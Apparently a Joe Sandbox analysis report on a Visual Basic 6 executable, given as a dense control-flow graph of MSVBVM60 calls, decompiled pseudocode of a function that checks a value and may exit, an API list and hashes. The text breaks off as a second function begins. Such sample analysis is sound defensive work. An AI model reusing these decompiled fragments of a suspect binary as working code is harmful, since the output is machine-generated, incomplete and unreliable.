__vbaStrCopy 1675 41ba90 1674->1675 1676 41babf 1675->1676 1677 41ba9f __vbaHresultCheckObj 1675->1677 1678 41bac6 __vbaFreeStr 1676->1678 1677->1678 1700 41a3ec __vbaChkstk 1678->1700 1679 41bb1f 1680 41bb4e 1679->1680 1681 41bb2e __vbaHresultCheckObj 1679->1681 1682 41bb55 __vbaStrCopy __vbaStrCopy 1680->1682 1681->1682 1683 41bbbe 1682->1683 1684 41bbed 1683->1684 1685 41bbcd __vbaHresultCheckObj 1683->1685 1686 41bbf4 __vbaFreeStrList __vbaOnError 1684->1686 1685->1686 1687 41bc39 1686->1687 1688 41bc6a 1687->1688 1689 41bc4a __vbaHresultCheckObj 1687->1689 1690 41bcbd 1688->1690 1691 41bc9d __vbaHresultCheckObj 1688->1691 1689->1688 1692 41bcc4 __vbaVarMove 1690->1692 1691->1692 1693 41bcf1 __vbaVarAdd __vbaVarMove __vbaVarTstLt 1692->1693 1694 41bd61 __vbaVarMove 1693->1694 1695 41bd5f 1693->1695 1697 41bdda __vbaFreeStr __vbaFreeVar __vbaFreeVar __vbaAryDestruct __vbaFreeStr 1694->1697 1695->1693 1697->1662 1698->1674 1701 41a42e __vbaRecUniToAnsi __vbaStrToAnsi 1700->1701 1714 4138e4 1701->1714 1703 41a45e __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStr 1704 41a4b4 10 API calls 1703->1704 1705 41a4af __vbaEnd 1703->1705 1706 41a593 __vbaFpI4 1704->1706 1707 41a60f #693 1704->1707 1705->1704 1711 41a5d7 1706->1711 1708 41a623 __vbaVarDup #600 __vbaFreeVar 1707->1708 1709 41a667 __vbaFreeStr 1707->1709 1708->1709 1709->1679 1712 41a608 1711->1712 1713 41a5e8 __vbaHresultCheckObj 1711->1713 1712->1707 1713->1707 1715 4138ed 1714->1715 1715->1715 1719 414de4 __vbaChkstk 1720 414e31 1719->1720 1721 414e5b __vbaSetSystemError 1720->1721 1722 414e72 __vbaInStr 1721->1722 1723 414e8e __vbaStrCopy __vbaStrToAnsi 1721->1723 1722->1723 1899 413130 1723->1899 1900 413139 1899->1900 1901 418b8a __vbaChkstk 1902 418bcc 7 API calls 1901->1902 1903 418c48 __vbaChkstk __vbaChkstk 1902->1903 1904 418cd7 1902->1904 1907 418ca6 1903->1907 1905 418cf7 __vbaGenerateBoundsError 1904->1905 1906 418cee 1904->1906 1905->1906 1909 418d24 1906->1909 1910 418d2d __vbaGenerateBoundsError 1906->1910 1907->1904 1908 418cb7 __vbaHresultCheckObj 1907->1908 1908->1904 1911 418d63 __vbaGenerateBoundsError 1909->1911 1912 418d5a 1909->1912 1910->1909 1911->1912 1913 418d90 1912->1913 1914 418d99 __vbaGenerateBoundsError 1912->1914 1915 418dc6 1913->1915 1916 418dcf __vbaGenerateBoundsError 1913->1916 1914->1913 1917 418e05 __vbaGenerateBoundsError 1915->1917 1918 418dfc 1915->1918 1916->1915 1917->1918 1919 418e32 1918->1919 1920 418e3b __vbaGenerateBoundsError 1918->1920 1921 418e71 __vbaGenerateBoundsError 1919->1921 1922 418e68 1919->1922 1920->1919 1921->1922 1923 418ea7 __vbaGenerateBoundsError 1922->1923 1924 418e9e 1922->1924 1923->1924 1925 418ed4 1924->1925 1926 418edd __vbaGenerateBoundsError 1924->1926 1927 418f13 __vbaGenerateBoundsError 1925->1927 1928 418f0a 1925->1928 1926->1925 1927->1928 1929 418f40 1928->1929 1930 418f49 __vbaGenerateBoundsError 1928->1930 1931 418f76 1929->1931 1932 418f7f __vbaGenerateBoundsError 1929->1932 1930->1929 1933 418fb5 __vbaGenerateBoundsError 1931->1933 1934 418fac 1931->1934 1932->1931 1933->1934 1935 418fe2 1934->1935 1936 418feb __vbaGenerateBoundsError 1934->1936 1937 419021 __vbaGenerateBoundsError 1935->1937 1938 419018 1935->1938 1936->1935 1937->1938 1939 419057 __vbaGenerateBoundsError 1938->1939 1940 41904e 1938->1940 1939->1940 1941 419084 1940->1941 1942 41908d __vbaGenerateBoundsError 1940->1942 1943 4190c3 __vbaGenerateBoundsError 1941->1943 1944 4190ba 1941->1944 1942->1941 1943->1944 1945 4190f0 1944->1945 1946 4190f9 __vbaGenerateBoundsError 1944->1946 1947 419126 1945->1947 1948 41912f __vbaGenerateBoundsError 1945->1948 1946->1945 1949 419165 __vbaGenerateBoundsError 1947->1949 1950 41915c 1947->1950 1948->1947 1949->1950 1951 419192 1950->1951 1952 41919b __vbaGenerateBoundsError 1950->1952 1953 4191d1 __vbaGenerateBoundsError 1951->1953 1954 4191c8 1951->1954 1952->1951 1953->1954 1955 419207 __vbaGenerateBoundsError 1954->1955 1956 4191fe 1954->1956 1955->1956 1957 419234 1956->1957 1958 41923d __vbaGenerateBoundsError 1956->1958 1959 419273 __vbaGenerateBoundsError 1957->1959 1960 41926a 1957->1960 1958->1957 1959->1960 1961 4192a0 1960->1961 1962 4192a9 __vbaGenerateBoundsError 1960->1962 1963 4192d6 1961->1963 1964 4192df __vbaGenerateBoundsError 1961->1964 1962->1961 1965 419315 __vbaGenerateBoundsError 1963->1965 1966 41930c 1963->1966 1964->1963 1965->1966 1967 419342 1966->1967 1968 41934b __vbaGenerateBoundsError 1966->1968 1969 419381 __vbaGenerateBoundsError 1967->1969 1970 419378 1967->1970 1968->1967 1969->1970 1971 4193b7 __vbaGenerateBoundsError 1970->1971 1972 4193ae 1970->1972 1971->1972 1973 4193e4 1972->1973 1974 4193ed __vbaGenerateBoundsError 1972->1974 1975 419423 __vbaGenerateBoundsError 1973->1975 1976 41941a 1973->1976 1974->1973 1975->1976 1977 419450 1976->1977 1978 419459 __vbaGenerateBoundsError 1976->1978 1979 419486 1977->1979 1980 41948f __vbaGenerateBoundsError 1977->1980 1978->1977 1981 4194c5 __vbaGenerateBoundsError 1979->1981 1982 4194bc 1979->1982 1980->1979 1981->1982 1983 4194f2 1982->1983 1984 4194fb __vbaGenerateBoundsError 1982->1984 1985 419531 __vbaGenerateBoundsError 1983->1985 1986 419528 1983->1986 1984->1983 1985->1986 1987 419567 __vbaGenerateBoundsError 1986->1987 1988 41955e 1986->1988 1987->1988 1989 419594 1988->1989 1990 41959d __vbaGenerateBoundsError 1988->1990 1991 4195d3 __vbaGenerateBoundsError 1989->1991 1992 4195ca 1989->1992 1990->1989 1991->1992 1993 419600 1992->1993 1994 419609 __vbaGenerateBoundsError 1992->1994 1995 419636 1993->1995 1996 41963f __vbaGenerateBoundsError 1993->1996 1994->1993 1997 419675 __vbaGenerateBoundsError 1995->1997 1998 41966c 1995->1998 1996->1995 1997->1998 1999 4196a2 1998->1999 2000 4196ab __vbaGenerateBoundsError 1998->2000 2001 4196e1 __vbaGenerateBoundsError 1999->2001 2002 4196d8 1999->2002 2000->1999 2001->2002 2003 419717 __vbaGenerateBoundsError 2002->2003 2004 41970e 2002->2004 2003->2004 2005 419744 2004->2005 2006 41974d __vbaGenerateBoundsError 2004->2006 2007 419783 __vbaGenerateBoundsError 2005->2007 2008 41977a 2005->2008 2006->2005 2007->2008 2009 4197b0 2008->2009 2010 4197b9 __vbaGenerateBoundsError 2008->2010 2011 4197e6 2009->2011 2012 4197ef __vbaGenerateBoundsError 2009->2012 2010->2009 2013 419825 __vbaGenerateBoundsError 2011->2013 2014 41981c 2011->2014 2012->2011 2013->2014 2015 419852 2014->2015 2016 41985b __vbaGenerateBoundsError 2014->2016 2017 419891 __vbaGenerateBoundsError 2015->2017 2018 419888 2015->2018 2016->2015 2017->2018 2019 4198c7 __vbaGenerateBoundsError 2018->2019 2020 4198be 2018->2020 2019->2020 2021 4198f4 2020->2021 2022 4198fd __vbaGenerateBoundsError 2020->2022 2023 419933 __vbaGenerateBoundsError 2021->2023 2024 41992a 2021->2024 2022->2021 2023->2024 2025 419960 2024->2025 2026 419969 __vbaGenerateBoundsError 2024->2026 2027 419996 2025->2027 2028 41999f __vbaGenerateBoundsError 2025->2028 2026->2025 2029 4199d5 __vbaGenerateBoundsError 2027->2029 2030 4199cc 2027->2030 2028->2027 2029->2030 2031 419a02 2030->2031 2032 419a0b __vbaGenerateBoundsError 2030->2032 2033 419a41 __vbaGenerateBoundsError 2031->2033 2034 419a38 2031->2034 2032->2031 2033->2034 2035 419a77 __vbaGenerateBoundsError 2034->2035 2036 419a6e 2034->2036 2035->2036 2037 419aa4 2036->2037 2038 419aad __vbaGenerateBoundsError 2036->2038 2039 419ae3 __vbaGenerateBoundsError 2037->2039 2040 419ada 2037->2040 2038->2037 2039->2040 2041 419b10 2040->2041 2042 419b19 __vbaGenerateBoundsError 2040->2042 2043 419b46 2041->2043 2044 419b4f __vbaGenerateBoundsError 2041->2044 2042->2041 2045 419b85 __vbaGenerateBoundsError 2043->2045 2046 419b7c 2043->2046 2044->2043 2045->2046 2047 419bb2 2046->2047 2048 419bbb __vbaGenerateBoundsError 2046->2048 2049 419bf1 __vbaGenerateBoundsError 2047->2049 2050 419be8 2047->2050 2048->2047 2049->2050 2051 419c27 __vbaGenerateBoundsError 2050->2051 2052 419c1e 2050->2052 2051->2052 2053 419c54 2052->2053 2054 419c5d __vbaGenerateBoundsError 2052->2054 2055 419c93 __vbaGenerateBoundsError 2053->2055 2056 419c8a 2053->2056 2054->2053 2055->2056 2057 419cc0 2056->2057 2058 419cc9 __vbaGenerateBoundsError 2056->2058 2059 419cf6 2057->2059 2060 419cff __vbaGenerateBoundsError 2057->2060 2058->2057 2061 419d35 __vbaGenerateBoundsError 2059->2061 2062 419d2c 2059->2062 2060->2059 2063 419d40 6 API calls 2061->2063 2062->2063 2064 419db5 2063->2064 2065 419e98 2063->2065 2068 419dd9 2064->2068 2069 419dbe __vbaNew2 2064->2069 2066 419eb1 __vbaGenerateBoundsError 2065->2066 2067 419ea8 2065->2067 2066->2067 2070 419ee1 2067->2070 2071 419eea __vbaGenerateBoundsError 2067->2071 2074 419e37 2068->2074 2075 419e17 __vbaHresultCheckObj 2068->2075 2069->2068 2072 419ef5 #682 __vbaFpR8 2070->2072 2071->2072 2073 419f3e __vbaFreeVar 2072->2073 2077 419f73 __vbaInStr 2073->2077 2078 419f8c 2073->2078 2081 419e89 2074->2081 2082 419e69 __vbaHresultCheckObj 2074->2082 2075->2074 2077->2078 2079 419fb0 2078->2079 2080 419f95 __vbaNew2 2078->2080 2084 41a00e 2079->2084 2085 419fee __vbaHresultCheckObj 2079->2085 2080->2079 2083 419e90 __vbaFreeObj 2081->2083 2082->2083 2083->2065 2086 41a047 __vbaHresultCheckObj 2084->2086 2087 41a06a 2084->2087 2085->2084 2088 41a071 6 API calls 2086->2088 2087->2088 2089 41a123 __vbaFreeStr __vbaFreeVarList 2088->2089 2091 41a186 __vbaChkstk __vbaChkstk __vbaChkstk __vbaLateMemCall 2089->2091 2092 41a20f #671 __vbaFpR8 2089->2092 2091->2092 2093 41a241 #580 2092->2093 2094 41a24d __vbaVarDup #564 2092->2094 2093->2094 2095 41a2a1 2094->2095 2096 41a28e __vbaHresultCheck 2094->2096 2097 41a2a8 __vbaVarTstNe __vbaFreeVarList 2095->2097 2096->2097 2098 41a33a __vbaFreeObj __vbaAryDestruct __vbaFreeStr __vbaAryDestruct 2097->2098 2099 41a2f6 2097->2099 2099->2098 2101 41a31a __vbaHresultCheckObj 2099->2101 2101->2098 1716 40166c #100 1717 401696 1716->1717 2102 41678e __vbaChkstk 2103 4167d7 7 API calls 2102->2103 2104 416847 __vbaLenBstrB 2103->2104 2105 41683d #532 2103->2105 2106 416916 6 API calls 2104->2106 2107 41685a 2104->2107 2105->2104 2108 416ae6 7 API calls 2106->2108 2109 4169bb 2106->2109 2110 416863 __vbaNew2 2107->2110 2111 41687e 2107->2111 2112 416c96 8 API calls 2108->2112 2113 416b8b 2108->2113 2114 4169c4 __vbaNew2 2109->2114 2115 4169df 2109->2115 2116 416888 __vbaLateMemCallLd __vbaObjVar __vbaObjSetAddref 2110->2116 2111->2116 2117 416d12 __vbaVarDup #595 __vbaFreeVarList 2112->2117 2118 416d8f 2112->2118 2119 416b94 __vbaNew2 2113->2119 2120 416baf 2113->2120 2114->2115 2127 416a3d 2115->2127 2128 416a1d __vbaHresultCheckObj 2115->2128 2121 4168ce 2116->2121 2117->2118 2122 416db3 2118->2122 2123 416d98 __vbaNew2 2118->2123 2119->2120 2129 416c0d 2120->2129 2130 416bed __vbaHresultCheckObj 2120->2130 2124 4168ff 2121->2124 2125 4168df __vbaHresultCheckObj 2121->2125 2132 416e11 2122->2132 2133 416df1 __vbaHresultCheckObj 2122->2133 2123->2122 2126 416906 __vbaFreeObj __vbaFreeVar 2124->2126 2125->2126 2126->2106 2131 416a44 __vbaChkstk 2127->2131 2128->2131 2134 416c14 __vbaChkstk 2129->2134 2130->2134 2135 416a8a 2131->2135 2143 416e4a __vbaHresultCheckObj 2132->2143 2144 416e6d 2132->2144 2133->2132 2138 416c56 2134->2138 2136 416abb 2135->2136 2137 416a9b __vbaHresultCheckObj 2135->2137 2139 416ac2 __vbaObjSet __vbaFreeObj 2136->2139 2137->2139 2140 416c87 2138->2140 2141 416c67 __vbaHresultCheckObj 2138->2141 2139->2108 2142 416c8e __vbaFreeObj 2140->2142 2141->2142 2142->2112 2145 416e74 __vbaStrMove __vbaFreeObj 2143->2145 2144->2145 2146 416eea __vbaFreeObj __vbaFreeObj __vbaFreeStr __vbaFreeStr 2145->2146 2147 41a6be __vbaChkstk 2148 41a700 __vbaAryConstruct2 2147->2148 2149 41a734 2148->2149 2150 41a719 __vbaNew2 2148->2150 2151 41a792 2149->2151 2152 41a772 __vbaHresultCheckObj 2149->2152 2150->2149 2153 41a7f1 2151->2153 2154 41a7ce __vbaHresultCheckObj 2151->2154 2152->2151 2155 41a7f8 __vbaFreeObj 2153->2155 2154->2155 2156 41a823 #570 2155->2156 2157 41a82d 2155->2157 2156->2157 2158 41a836 __vbaSetSystemError 2157->2158 2159 41a885 2158->2159 2160 41a84d __vbaVarDup #600 __vbaFreeVar 2158->2160 2161 41a895 2159->2161 2162 41a89e __vbaGenerateBoundsError 2159->2162 2160->2159 2163 41a8d7 __vbaGenerateBoundsError 2161->2163 2164 41a8ce 2161->2164 2162->2161 2165 41a8e2 #683 __vbaFpR8 2163->2165 2164->2165 2166 41a92f __vbaVarDup #596 __vbaStrMove __vbaFreeVarList 2165->2166 2167 41aa3e #613 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 2165->2167 2166->2167 2168 41aa97 2167->2168 2169 41aac8 2168->2169 2170 41aaa8 __vbaHresultCheckObj 2168->2170 2171 41ab15 2169->2171 2172 41aaf5 __vbaHresultCheckObj 2169->2172 2170->2169 2173 41ab29 __vbaEnd 2171->2173 2174 41ab2e 2171->2174 2172->2171 2173->2174 2175 41ab52 2174->2175 2176 41ab37 __vbaNew2 2174->2176 2177 41abb0 2175->2177 2178 41ab90 __vbaHresultCheckObj 2175->2178 2176->2175 2179 41abe9 __vbaHresultCheckObj 2177->2179 2180 41ac0c 2177->2180 2178->2177 2181 41ac13 __vbaStrMove __vbaFreeObj 2179->2181 2180->2181 2182 41ac5a 2181->2182 2183 41ac3f __vbaNew2 2181->2183 2184 41acb8 2182->2184 2185 41ac98 __vbaHresultCheckObj 2182->2185 2183->2182 2186 41acf4 __vbaHresultCheckObj 2184->2186 2187 41ad17 2184->2187 2185->2184 2188 41ad1e __vbaFreeObj __vbaVarErrI4 #559 __vbaFreeVar 2186->2188 2187->2188 2189 41ad74 2188->2189 2190 41ae9e __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 2188->2190 2192 41ad98 2189->2192 2193 41ad7d __vbaNew2 2189->2193 2194 41adf6 2192->2194 2195 41add6 __vbaHresultCheckObj 2192->2195 2193->2192 2196 41adfd __vbaChkstk 2194->2196 2195->2196 2197 41ae43 2196->2197 2198 41ae74 2197->2198 2199 41ae54 __vbaHresultCheckObj 2197->2199 2200 41ae7b __vbaStrMove __vbaFreeObj 2198->2200 2199->2200 2200->2190

      Executed Functions

      Control-flow Graph

      C-Code - Quality: 61%
      			E0041A3EC(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr* _v16;
      				char _v616;
      				char _v620;
      				long long _v624;
      				long long _v632;
      				char _v636;
      				intOrPtr _v644;
      				char _v652;
      				char* _v676;
      				char _v684;
      				intOrPtr _v692;
      				char _v700;
      				intOrPtr _v704;
      				signed char _v708;
      				char _v1028;
      				signed char _v1040;
      				char* _t63;
      				char* _t64;
      				char* _t71;
      				signed char _t76;
      				signed char _t77;
      				signed short _t78;
      				char* _t87;
      				void* _t96;
      				void* _t98;
      				intOrPtr* _t99;
      				long long _t105;
      
      				_t105 = __fp0;
      				_t99 = _t98 - 0xc;
      				 *[fs:0x0] = _t99;
      				L004013D0();
      				_v16 = _t99;
      				_v12 = 0x401288;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013d6, _t96);
      				_push( &_v616);
      				_t63 =  &_v1028;
      				_push(_t63);
      				_push(0x412dd0);
      				L004015E6();
      				_push(_t63);
      				_push(L"APELLES");
      				_t64 =  &_v636;
      				_push(_t64);
      				L00401640();
      				_push(_t64); // executed
      				E004138E4(); // executed
      				_v704 = _t64;
      				L0040164C();
      				_push( &_v1028);
      				_push( &_v616);
      				_push(0x412dd0);
      				L004015E0();
      				_v708 =  ~(0 | _v704 == 0x0027d3b4);
      				L0040161C();
      				if(_v708 != 0) {
      					L0040159E();
      				}
      				_v644 = 0x80020004;
      				_v652 = 0xa;
      				_t71 =  &_v652;
      				_push(_t71);
      				L004014C0();
      				_v624 = _t105;
      				L0040160A();
      				_push(0x4141c8);
      				_push(0x414030);
      				L00401538();
      				L0040162E();
      				_push(_t71);
      				_push(0x4141d0);
      				L00401538();
      				L0040162E();
      				L0040161C();
      				_v676 =  &_v620;
      				_v684 = 0x4008;
      				_push(1);
      				_push( &_v684);
      				_push( &_v652);
      				L004014BA();
      				_v692 = 0x4141d0;
      				_v700 = 0x8008;
      				_push( &_v652);
      				_t76 =  &_v700;
      				_push(_t76);
      				L00401580();
      				_v708 = _t76;
      				_t87 =  &_v652;
      				L0040160A();
      				_t77 = _v708;
      				if(_t77 != 0) {
      					L004015CE();
      					 *_t99 =  *0x40127c;
      					 *_t99 =  *0x401278;
      					 *_t99 =  *0x401274;
      					_t105 =  *0x401270;
      					 *_t99 = _t105;
      					_t77 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t87, _t87, _t87, _t87, _t77);
      					asm("fclex");
      					_v708 = _t77;
      					if(_v708 >= 0) {
      						_v1040 = _v1040 & 0x00000000;
      					} else {
      						_push(0x2c8);
      						_push(0x4120bc);
      						_push(_a4);
      						_push(_v708);
      						L00401622();
      						_v1040 = _t77;
      					}
      				}
      				_push(0x414030);
      				L004014B4();
      				_t78 = _t77 & 0x000000ff;
      				if(_t78 != 0x61) {
      					_v676 = L"Globed1";
      					_v684 = 8;
      					L004015B6();
      					_push(2);
      					_t78 =  &_v652;
      					_push(_t78);
      					L004015BC();
      					_v632 = _t105;
      					L0040160A();
      				}
      				asm("wait");
      				_push(0x41a69f);
      				L0040161C();
      				return _t78;
      			}
































      0x0041a3ec
      0x0041a3ef
      0x0041a3fe
      0x0041a40a
      0x0041a412
      0x0041a415
      0x0041a41c
      0x0041a42b
      0x0041a434
      0x0041a435
      0x0041a43b
      0x0041a43c
      0x0041a441
      0x0041a446
      0x0041a447
      0x0041a44c
      0x0041a452
      0x0041a453
      0x0041a458
      0x0041a459
      0x0041a45e
      0x0041a464
      0x0041a46f
      0x0041a476
      0x0041a477
      0x0041a47c
      0x0041a492
      0x0041a49f
      0x0041a4ad
      0x0041a4af
      0x0041a4af
      0x0041a4b4
      0x0041a4be
      0x0041a4c8
      0x0041a4ce
      0x0041a4cf
      0x0041a4d4
      0x0041a4e0
      0x0041a4e5
      0x0041a4ea
      0x0041a4ef
      0x0041a4fc
      0x0041a501
      0x0041a502
      0x0041a507
      0x0041a514
      0x0041a51f
      0x0041a52a
      0x0041a530
      0x0041a53a
      0x0041a542
      0x0041a549
      0x0041a54a
      0x0041a54f
      0x0041a559
      0x0041a569
      0x0041a56a
      0x0041a570
      0x0041a571
      0x0041a576
      0x0041a57d
      0x0041a583
      0x0041a588
      0x0041a591
      0x0041a599
      0x0041a5a6
      0x0041a5b0
      0x0041a5ba
      0x0041a5bd
      0x0041a5c4
      0x0041a5d1
      0x0041a5d7
      0x0041a5d9
      0x0041a5e6
      0x0041a608
      0x0041a5e8
      0x0041a5e8
      0x0041a5ed
      0x0041a5f2
      0x0041a5f5
      0x0041a5fb
      0x0041a600
      0x0041a600
      0x0041a5e6
      0x0041a60f
      0x0041a614
      0x0041a619
      0x0041a621
      0x0041a623
      0x0041a62d
      0x0041a643
      0x0041a648
      0x0041a64a
      0x0041a650
      0x0041a651
      0x0041a656
      0x0041a662
      0x0041a662
      0x0041a667
      0x0041a668
      0x0041a699
      0x0041a69e

      APIs
      • __vbaChkstk.MSVBVM60(?,004013D6), ref: 0041A40A
      • __vbaRecUniToAnsi.MSVBVM60(00412DD0,?,?,?,?,?,?,004013D6), ref: 0041A441
      • __vbaStrToAnsi.MSVBVM60(?,APELLES,00000000,00412DD0,?,?,?,?,?,?,004013D6), ref: 0041A453
      • __vbaSetSystemError.MSVBVM60(00000000,?,APELLES,00000000,00412DD0,?,?,?,?,?,?,004013D6), ref: 0041A464
      • __vbaRecAnsiToUni.MSVBVM60(00412DD0,?,?,00000000,?,APELLES,00000000,00412DD0,?,?,?,?,?,?,004013D6), ref: 0041A47C
      • __vbaFreeStr.MSVBVM60 ref: 0041A49F
      • __vbaEnd.MSVBVM60 ref: 0041A4AF
      • #593.MSVBVM60(0000000A), ref: 0041A4CF
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041A4E0
      • __vbaStrCat.MSVBVM60(00414030,004141C8,0000000A), ref: 0041A4EF
      • __vbaStrMove.MSVBVM60(00414030,004141C8,0000000A), ref: 0041A4FC
      • __vbaStrCat.MSVBVM60(004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A507
      • __vbaStrMove.MSVBVM60(004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A514
      • __vbaFreeStr.MSVBVM60(004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A51F
      • #619.MSVBVM60(0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A54A
      • __vbaVarTstNe.MSVBVM60(00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A571
      • __vbaFreeVar.MSVBVM60(00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A583
      • __vbaFpI4.MSVBVM60(00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A599
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401288,004120BC,000002C8,?,?,?,?,00000000,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000), ref: 0041A5FB
      • #693.MSVBVM60(00414030,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A614
      • __vbaVarDup.MSVBVM60(00414030,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A643
      • #600.MSVBVM60(0000000A,00000002,00414030,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A651
      • __vbaFreeVar.MSVBVM60(0000000A,00000002,00414030,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A662
      • __vbaFreeStr.MSVBVM60(0041A69F,00414030,00008008,0000000A,0000000A,00004008,00000001,004141D0,00000000,00414030,004141C8,0000000A), ref: 0041A699
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: __vba$Free$Ansi$Move$#593#600#619#693CheckChkstkErrorHresultSystem
      • String ID: APELLES$Globed1
      • API String ID: 151820657-4004846181
      • Opcode ID: cf4a6077de576ab4625b3a22642e542c22e980a7c37b9db6d83eb7000a7a58bf
      • Instruction ID: af0398ece59123bf3aa41978a55e4c4c638d01457687c79d03c35f14e0d16339
      • Opcode Fuzzy Hash: cf4a6077de576ab4625b3a22642e542c22e980a7c37b9db6d83eb7000a7a58bf
      • Instruction Fuzzy Hash: CE515D74901218ABDB50EB61CC8DBDEBBB8BF04304F4046EAB149B61A1DF794AC5CF19
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 41af55-41afce __vbaChkstk __vbaAryConstruct2 2 41afd0-41afe9 __vbaNew2 0->2 3 41afeb 0->3 4 41aff5-41b027 2->4 3->4 6 41b049 4->6 7 41b029-41b047 __vbaHresultCheckObj 4->7 8 41b050-41b083 6->8 7->8 10 41b085-41b0a6 __vbaHresultCheckObj 8->10 11 41b0a8 8->11 12 41b0af-41b0df __vbaFreeObj 10->12 11->12 14 41b101 12->14 15 41b0e1-41b0ff __vbaHresultCheckObj 12->15 16 41b108-41b131 __vbaStrCmp __vbaFreeStr 14->16 15->16 17 41b133-41b13a __vbaEnd 16->17 18 41b13f-41b160 call 4138b0 __vbaSetSystemError 16->18 17->18 21 41b203-41b2cd #648 __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #557 __vbaFreeStrList __vbaFreeVar 18->21 22 41b166-41b1da __vbaChkstk * 2 18->22 23 41b2d3-41b32d __vbaFpI4 21->23 24 41b356-41b36b 21->24 28 41b1fc 22->28 29 41b1dc-41b1fa __vbaHresultCheckObj 22->29 34 41b34f 23->34 35 41b32f-41b34d __vbaHresultCheckObj 23->35 26 41b376-41b37b __vbaGenerateBoundsError 24->26 27 41b36d-41b374 24->27 31 41b381-41b3a7 26->31 27->31 28->21 29->21 32 41b3b2-41b3b7 __vbaGenerateBoundsError 31->32 33 41b3a9-41b3b0 31->33 36 41b3bd-41b400 #684 __vbaFpR8 32->36 33->36 34->24 35->24 37 41b406-41b4b3 #685 __vbaObjSet 36->37 38 41b50a-41b555 #592 __vbaFreeVar 36->38 44 41b4d5 37->44 45 41b4b5-41b4d3 __vbaHresultCheckObj 37->45 39 41b557-41b5a6 __vbaVarDup #667 __vbaStrMove __vbaFreeVar 38->39 40 41b5ab-41b600 #670 __vbaVarTstEq __vbaFreeVar 38->40 39->40 42 41b606-41b614 40->42 43 41b71d-41b72b 40->43 48 41b631 42->48 49 41b616-41b62f __vbaNew2 42->49 46 41b748 43->46 47 41b72d-41b746 __vbaNew2 43->47 50 41b4dc-41b507 __vbaFreeObj __vbaFreeVarList 44->50 45->50 51 41b752-41b784 46->51 47->51 52 41b63b-41b66d 48->52 49->52 50->38 55 41b7a6 51->55 56 41b786-41b7a4 __vbaHresultCheckObj 51->56 57 41b68f 52->57 58 41b66f-41b68d __vbaHresultCheckObj 52->58 59 41b7ad-41b7e0 55->59 56->59 60 41b696-41b6ec __vbaChkstk 57->60 58->60 63 41b7e2-41b803 __vbaHresultCheckObj 59->63 64 41b805 59->64 65 41b70e 60->65 66 41b6ee-41b70c __vbaHresultCheckObj 60->66 67 41b80c-41b83b __vbaFreeObj _CIcos __vbaFpR8 63->67 64->67 68 41b715-41b718 __vbaFreeObj 65->68 66->68 69 41b841-41b856 67->69 70 41b8f5-41b996 __vbaStrCopy * 2 67->70 68->43 71 41b873 69->71 72 41b858-41b871 __vbaNew2 69->72 75 41b9b8 70->75 76 41b998-41b9b6 __vbaHresultCheckObj 70->76 73 41b87d-41b8b1 71->73 72->73 79 41b8d3 73->79 80 41b8b3-41b8d1 __vbaHresultCheckObj 73->80 77 41b9bf-41ba9d __vbaFreeStrList call 4134fc __vbaStrCopy 75->77 76->77 84 41babf 77->84 85 41ba9f-41babd __vbaHresultCheckObj 77->85 81 41b8da-41b8f0 __vbaStrMove 79->81 80->81 81->70 86 41bac6-41bb2c __vbaFreeStr call 41a3ec 84->86 85->86 88 41bb4e 86->88 89 41bb2e-41bb4c __vbaHresultCheckObj 86->89 90 41bb55-41bbb5 __vbaStrCopy * 2 88->90 89->90 91 41bbbe-41bbcb 90->91 92 41bbed 91->92 93 41bbcd-41bbeb __vbaHresultCheckObj 91->93 94 41bbf4-41bc48 __vbaFreeStrList __vbaOnError 92->94 93->94 96 41bc6a 94->96 97 41bc4a-41bc68 __vbaHresultCheckObj 94->97 98 41bc71-41bc9b 96->98 97->98 100 41bcbd 98->100 101 41bc9d-41bcbb __vbaHresultCheckObj 98->101 102 41bcc4-41bcec __vbaVarMove 100->102 101->102 103 41bcf1-41bd5d __vbaVarAdd __vbaVarMove __vbaVarTstLt 102->103 104 41bd61-41bd68 103->104 105 41bd5f 103->105 106 41bd72-41bd79 104->106 105->103 106->106 107 41bd7b-41be11 __vbaVarMove __vbaFreeStr __vbaFreeVar * 2 __vbaAryDestruct __vbaFreeStr 106->107
      C-Code - Quality: 61%
      			E0041AF55(void* __ebx, void* __edi, void* __esi, signed int _a4) {
      				char _v8;
      				signed int _v16;
      				signed int _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				void* _v40;
      				void* _v56;
      				char _v72;
